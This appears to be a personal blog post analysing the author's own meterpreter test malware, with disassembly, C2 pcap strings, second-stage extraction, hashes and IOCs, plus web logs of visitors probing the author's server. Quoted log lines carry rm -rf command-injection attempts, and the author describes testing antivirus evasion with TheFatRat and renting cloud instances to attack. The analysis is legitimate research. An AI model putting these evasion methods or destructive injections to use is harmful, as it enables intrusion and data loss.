      ||,=< 0x000000cc      714f           jno 0x11d
     ||||   0x000000ce      97             xchg eax, edi
      ,===< 0x000000cf      7756           ja 0x127
    |||||   0x000000d1      bf1e91c8ef     mov edi, 0xefc8911e
     ,====< 0x000000d6      700e           jo 0xe6
   ||||||   0x000000d8      a85f           test al, 0x5f               ; '_'
   ||||||   0x000000da      31fe           xor esi, edi
   ||||||   0x000000dc      40             inc eax
   ||||||   0x000000dd      8abe2170b514   mov bh, byte [esi + 0x14b57021] ; [0x14b57021:1]=255
   ||||||   0x000000e3      4a             dec edx
   ||||||   0x000000e4      1a5ac1         sbb bl, byte [edx - 0x3f]
    |||||   0x000000e7      22b2c348b823   and dh, byte [edx + 0x23b848c3]
    |||||   0x000000ed      0b47c4         or eax, dword [edi - 0x3c]
    |||||   0x000000f0      638764382d60   arpl word [edi + 0x602d3864], ax
    |||||   0x000000f6      002a           add byte [edx], ch
    |||||   0x000000f8      d9805f104f9e   fld dword [eax - 0x61b0efa1]
     ,====< 0x000000fe      753f           jne 0x13f

; because lazy and time
https://app.any.run/tasks/995eb5e3-4c5f-4c47-b849-67ff647c6387

; Connection data
(myserver):9008 -> exe came across
dumped entire pcap from c2 into file:
- file resumepcap.hexdump
--  resumepcap.hexdump: data
egrep -nor '[^ ]{30,}' resumepcap.stringsdump |grep string
1237:string=core_negotiate_tlv_encryption
1238:string=core_transport_set_timeouts
1239:string=core_transport_getcerthash
1240:string=core_transport_setcerthash
1261:string=\a\a\b\b\t\t\n\n\v\v\f\f\r\r
1382:string=InitializeCriticalSectionEx
1385:string=SetThreadStackGuarantee
1388:string=WaitForThreadpoolTimerCallbacks
1393:string=FlushProcessWriteBuffers
1394:string=FreeLibraryWhenCallbackReturns
1395:string=GetCurrentProcessorNumber
1396:string=GetLogicalProcessorInformation
1398:string=SetDefaultDllDirectories
1404:string=GetUserDefaultLocaleName
1409:string=GetFileInformationByHandleExW
1410:string=SetFileInformationByHandleW
1436:string=GetUserObjectInformationW
1437:string=GetProcessWindowStation
1770:string=QQ𥸸𥽼𦃀ᙏὫ峹巋O3ï澢漣瀻瀎潌滺殭歩樭栺损槎摲撋搹敷掊搔措揉敆檇憺抪戡拔曇晬暧晜暄栎枵枍曧杘朏晋昪欗棭榨梽硒砩礓禔穑𦅭𦅲𦠑𦆆𦆗𦆦𦆴𦇃𦇛𦇯𦈅𦈠𦈰𦈿𦉒𦉲𦊄𦊖𦊥𦋃𦋔𦋥𦋵𦌌𦌙𦌦𦍁𦍡𦍳𦎋𦎩𦎺𦏈𦏢𦏺𦐍𦐤𦐳𦑈𦑙𦑮𦒂𦒛𦒹𦓎𦓟𦓵𦔉𦔞𦔳𦕆𦕜𦕰𦖇𦖢𦖲𦗒𦗠𦗴𦘋𦘚𦘪𦘹𦙔𦙨𦙾𦚘𦚳𦛌𦛨𦜂𦜟𦜯𦝍𦝮𦝾𦞝𦞶𦟈𦟝𦟷𠁐
1773:string=packet_get_tlv_value_string
1774:string=packet_get_tlv_value_uint
1775:string=packet_get_tlv_value_wstring
1777:string=packet_is_tlv_null_terminated
1778:string=packet_remove_completion_handler
1780:string=packet_transmit_empty_response
1781:string=packet_transmit_response
1784:string=scheduler_insert_waitable
1785:string=scheduler_signal_waitable
1786:string=_scheduler_waitable_thread@4
1789:string=CertGetCertificateContextProperty
1813:string=WinHttpGetIEProxyConfigForCurrentUser
1826:string=SetUnhandledExceptionFilter
1856:string=GetProcessWindowStation
1857:string=GetUserObjectInformationW
1862:string=AllocateAndInitializeSid
1864:string=InitializeSecurityDescriptor
1865:string=SetSecurityDescriptorDacl
1866:string=SetSecurityDescriptorSacl
1873:string=CryptImportPublicKeyInfo
1895:string=CreateToolhelp32Snapshot
1903:string=GetSystemTimeAsFileTime
1908:string=IsProcessorFeaturePresent
1922:string=QueryPerformanceCounter
1924:string=FreeEnvironmentStringsW
1925:string=UnhandledExceptionFilter
1926:string=InitializeCriticalSectionAndSpinCount
1946:string=ImpersonateLoggedOnUser
2008:string=core_pivot_session_died
2028:string=\a\a\b\b\t\t\n\n\v\v\f\f\r\r
2056:string=\t\a\f\b\f\t\f\n\a\v\b\f
2061:string=abcdefghijklmnopqrstuvwxyz
2062:string=ABCDEFGHIJKLMNOPQRSTUVWXYZ
2064:string=abcdefghijklmnopqrstuvwxyz
2065:string=ABCDEFGHIJKLMNOPQRSTUVWXYZ
2147:string=6#6'6+6/63676;6/8N8m8r8
2183:string=3\a43494=4B4H4L4R4V4\4`4e4k4o4u4y4
2186:string=:\b:$:0:6:A:O:X:b:r:w:|:
2212:string=2$2*22272=2E2J2P2X2]2c2k2p2v2~2
2248:string=6<:@:D:H:L:P:T:X:\:`:d:h:
2255:string=:$:,:4:<:D:L:T:\:d:l:t:|:
2256:string=;$;,;4;<;D;L;T;\;d;l;t;|;
2257:string=<$<,<4<<<D<L<T<\<d<l<t<|<
2258:string==$=,=4=<=D=L=T=\=d=l=t=|=
2259:string=>$>,>4><>D>L>T>\>d>l>t>|>
2260:string=?$?,?4?<?D?L?T?\?d?l?t?|?
2261:string=0$0,040<0D0L0T0\0d0l0t0|0

; Got new binary / 2nd stage
binwalk -e resumepcap.hexdump
file _resumepcap.hexdump.extracted/4
_resumepcap.hexdump.extracted/4: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
md5sum _resumepcap.hexdump.extracted/4
eeb70c0bd145011062f0116738e10a5e  _resumepcap.hexdump.extracted/4
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d md5: eeb70c0bd145011062f0116738e10a5e
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d sha1: 295be71de968e22a14c2a0fb558d3295b4c2a7c3
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d sha256: 5baecac3ee5cf8f8f0d13d19c540310681abbc1e6978e397d077885d6c104b6f
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d sha384: 950bee417b6b6fa9bbdb4becbcba3b574a4d8d4201d6a089bd8bf4a566291d976f803331999cd46ed2c53c49bdeda973
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d sha512: aa15fb09b5e8a5b9904ef3582f28a521afc32a1f3771dec65e5699b08bcad2fbccfb43c1124987cc1d78ba8814a98c75f28ff73a82f7c125c5515f389c7d9cff
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc16: 4df2
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc32: c854733c
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d md4: db31d79e9eaddfc0a93e043d058c9ca0
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d xor: ae
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d xorpair: 54fa
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d parity: 01
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d entropy: 07000000
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d hamdist: 06
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d pcprint: 22
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d mod255: f6
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d xxhash: ae3757fa
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d adler32: 52af2f02
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d luhn: 03
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc8smbus: ef
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc15can: 759f
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc16hdlc: 270e
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc16usb: 2328
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc16citt: 8672
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc24: bd3f25
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc32c: 2fa98f85
_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc32ecma267: c7e20603



; lazy again:
cp _resumepcap.hexdump.extracted/4 ./4.exe
https://www.virustotal.com/#/file/5baecac3ee5cf8f8f0d13d19c540310681abbc1e6978e397d077885d6c104b6f/detection
https://www.hybrid-analysis.com/sample/5baecac3ee5cf8f8f0d13d19c540310681abbc1e6978e397d077885d6c104b6f?environmentId=120

; Total IOCs
(myserver):9008
9A8FE886ABA12E02FD0FC44F004A7111

rahash2 -a all _resumepcap.hexdump.extracted/4 |awk '{print $3,$4}'
md5: eeb70c0bd145011062f0116738e10a5e
sha1: 295be71de968e22a14c2a0fb558d3295b4c2a7c3
sha256: 5baecac3ee5cf8f8f0d13d19c540310681abbc1e6978e397d077885d6c104b6f
sha384: 950bee417b6b6fa9bbdb4becbcba3b574a4d8d4201d6a089bd8bf4a566291d976f803331999cd46ed2c53c49bdeda973
sha512: aa15fb09b5e8a5b9904ef3582f28a521afc32a1f3771dec65e5699b08bcad2fbccfb43c1124987cc1d78ba8814a98c75f28ff73a82f7c125c5515f389c7d9cff
crc16: 4df2
crc32: c854733c
md4: db31d79e9eaddfc0a93e043d058c9ca0
xor: ae
xorpair: 54fa
parity: 01
entropy: 07000000
hamdist: 06
pcprint: 22
mod255: f6
xxhash: ae3757fa
adler32: 52af2f02
luhn: 03
crc8smbus: ef
crc15can: 759f
crc16hdlc: 270e
crc16usb: 2328
crc16citt: 8672
crc24: bd3f25
crc32c: 2fa98f85
crc32ecma267: c7e20603

rahash2 -a all resume1.doc.exe |awk '{print $3,$4}'
md5: 90f7ee1bf4451349dfa7c518a8c6202a
sha1: 0c214854fef6ac5c28f84bf07ee6d39eb3595d82
sha256: ea2bb0a47fedb86127a59e71285f61036e1ff9c4e0a1d0fae6fe8f2931e4d5a6
sha384: abfd2915e8b1bce3c871a8faec67b503599908c24ba08dfdcc8ca52c04560ec132328a31f53d4c8853ce12256488d0ad
sha512: fac47672393b774135997b98c86874667a526bc40c8ab04745d4c28de3b1afdea9f8efc257a9e8e4f42d3341f065a81bde0fe93a220a3adae338a1776bb5a691
crc16: 9f78
crc32: 1b63e4bd
md4: 282dcd274bd2efade3765ddff3ec65e1
xor: eb
xorpair: 3ad1
parity: 00
entropy: 03000000
hamdist: 01
pcprint: 2d
mod255: 4d
xxhash: 5924b386
adler32: 913ba49c
luhn: 00
crc8smbus: 3f
crc15can: 5a1d
crc16hdlc: 4045
crc16usb: a732
crc16citt: 4b6a
crc24: 7a1917
crc32c: d18b15a4
crc32ecma267: df97a7b0

rahash2 -a all resumebase64.decoded |awk '{print $3,$4}'
md5: 3205f33d70ec93109d60da5fe1002e7e
sha1: ec19a5fa86353b176941809b1e9858aead9047a3
sha256: e02b170466ee0f810656bfeca8c9c7ce523b635fa36248dd7f9259629a593be5
sha384: f232b1f8dd2d2c4d07dc761eb6ef1b7defbc6379f15222d607e43e22a2f0c48ea98986db9e32164e3c88287d34224d73
sha512: 547fb256993e4febce7f3da35ce5cfbf485e8ee97f9fe1861b82172b4c7f94082fa5b66738d289a0db2fb3be97acb900290786bf987f813ef00eb8aee97f1f51
crc16: 78af
crc32: d40234f5
md4: 1a8108290cfc7ffa605b0879d6e3b8f2
xor: 0a
xorpair: 0a00
parity: 00
entropy: 03000000
hamdist: 02
pcprint: 32
mod255: 98
xxhash: c09b7c9b
adler32: be051623
luhn: 09
crc8smbus: 84
crc15can: 4d93
crc16hdlc: e7fa
crc16usb: 8313
crc16citt: f7ba
crc24: e9c836
crc32c: 75c98a63
crc32ecma267: 04a00a8f

 The gist of all that, is that it connected back to port 9008 on my server where I have an active meterpreter listener forwarded to. Pretty easy, not really a difficult analysis, really a 5 minute rush job. But, it does help me know that meterpreter launches that secondary payload when ran, that's pretty sweet, though everyone sort of knew that. But since launching this and a few other things online, I've received a number of hits on my shell from people looking at that port:

185.220.101.6
163.172.214.8
37.59.20.111
107.178.194.23
52.200.221.20
14.141.107.206
66.249.88.132
208.87.233.140
185.220.101.13
161.69.99.11
5.62.59.93
1.192.194.17
134.96.238.193
50.112.194.65
As of the time of this writing:
curl "https://torstatus.blutmagie.de/ip_list_exit.php/Tor_ip_list_EXIT.csv" 2>/dev/null|grep "185.220.101.6\|163.172.214.8\|37.59.20.111\|107.178.194.23\|52.200.221.20\|50.112.194.65\|14.141.107.206\|66.249.88.132\|208.87.233.140\|185.220.101.13\|161.69.99.11\|5.62.59.93\|1.192.194.17\|134.96.238.193\|50.112.194.65"
163.172.214.8
185.220.101.6
185.220.101.13

This last one is sort of amusing because it tells me they looked a little bit into my site:

/var/log/apache2/access.log:50.112.194.65 - - [16/Apr/2018:07:31:29 -0500] "GET /diagfix.cmd HTTP/1.1" 200 7184 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
/var/log/apache2/access.log.8:50.112.194.65 - - [05/Mar/2018:10:29:43 -0600] "GET /miner.html?lol&rm -rf" 400 0 "-" "-"
/var/log/apache2/access.log.8:50.112.194.65 - - [05/Mar/2018:10:35:32 -0600] "GET / HTTP/1.1" 200 198376 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"

Edit, I wanted to add more because it amuses me the comparison between ips connecting to my c2 port for my test malware versus the hosts connecting to my web server, not including tor nodes:

grep -i "37.59.20.111\|107.178.194.23\|52.200.221.20\|14.141.107.206\|66.249.88.132\|208.87.233.140\|161.69.99.11\|5.62.59.93\|1.192.194.171\|34.96.238.193\|50.112.194.65" /var/log/apache2/access.log*                                  /var/log/apache2/access.log:50.112.194.65 - - [16/Apr/2018:07:31:29 -0500] "GET /diagfix.cmd HTTP/1.1" 200 7184 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
/var/log/apache2/access.log.8:107.178.194.23 - - [05/Mar/2018:10:26:56 -0600] "GET /miner.html?lol&rm%20-rf%20/boot/&rm%20-rf%20/opt/&rm%20-rf%20~/& HTTP/1.1" 200 654 "http://0daz.io" "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) AppEngine-Google; (+http://code.google.com/appengine; appid: s~virustotalcloud)"
/var/log/apache2/access.log.8:208.87.233.140 - - [05/Mar/2018:10:26:56 -0600] "GET /miner.html HTTP/1.1" 200 654 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13"
/var/log/apache2/access.log.8:208.87.233.140 - - [05/Mar/2018:10:26:57 -0600] "GET /coinhive.min.js HTTP/1.1" 200 18805 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13"
/var/log/apache2/access.log.8:50.112.194.65 - - [05/Mar/2018:10:29:43 -0600] "GET /miner.html?lol&rm -rf" 400 0 "-" "-"
/var/log/apache2/access.log.8:208.87.233.140 - - [05/Mar/2018:10:32:39 -0600] "GET / HTTP/1.1" 200 8440260 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_6) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1"
/var/log/apache2/access.log.8:52.200.221.20 - - [05/Mar/2018:10:35:21 -0600] "GET / HTTP/1.1" 200 157832 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
/var/log/apache2/access.log.8:50.112.194.65 - - [05/Mar/2018:10:35:32 -0600] "GET / HTTP/1.1" 200 198376 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"


These are both things that have been scanned with virus total or other platforms for shits and giggles, but this draws a clear understanding that some do, and some don't use tor with their analysis.

But what are people trying to analyze? Well the miner one, with that particular notion at the end, was one provided in another post on this blog plus my own get data to it. This was specific to a url attempt put into virus total because I want to track who's tracking this. The diagfix is unrelated, but is a repeatedly regenerated (every 300 seconds) unicorn powershell payload. Did this for ease of use and testing the "fud" capabilities of TheFatRat. Honestly, it does a decent job of evading some shit, but anyone who looks at it for a split second would recognize it. Yara rules could easily determine it, or the exec form. You'll see in my above example I left out the meterpreter yara rules, this is because well, analysis without the answer provided to me.

Things I learned with this week of dickery:

  • People seem to be rummaging through analyzing things they happen across, or that were involved in something flagged by the apt detection bs. 
  • apparently people detect meterpreter data as part of poison ivy
    • looked further, neat, the copy of poison ivy I have does partially contain code from meterpreter's stdapi nonsense it sends down. 
  • TheFatRat as a wrapper is pretty nice, but it can be ignored for the power.py and pw_exec.py tools on your own. Such as in a cron/at/while loop. 
  • Automated tools used when analyzing things often show weaker precautions than those meant to provide the reports. 
  • $5 cloud or docker instance, for a few hours of playing with just a minimal amount of preparation before hand, builds a full purposed suite for rapid spin up, attack, and spin down. 
    • Better yet, cloud services providing per hour pay, awww yeah... just don't assume they actually destroy things when it seems they did, go ahead and 0fill everything that you don't want shared before you deprovision. 

-Ferasdour
https://keybase.io/ferasdour
https://www.facebook.com/help.ferasdour

No comments:

Post a Comment

2am rant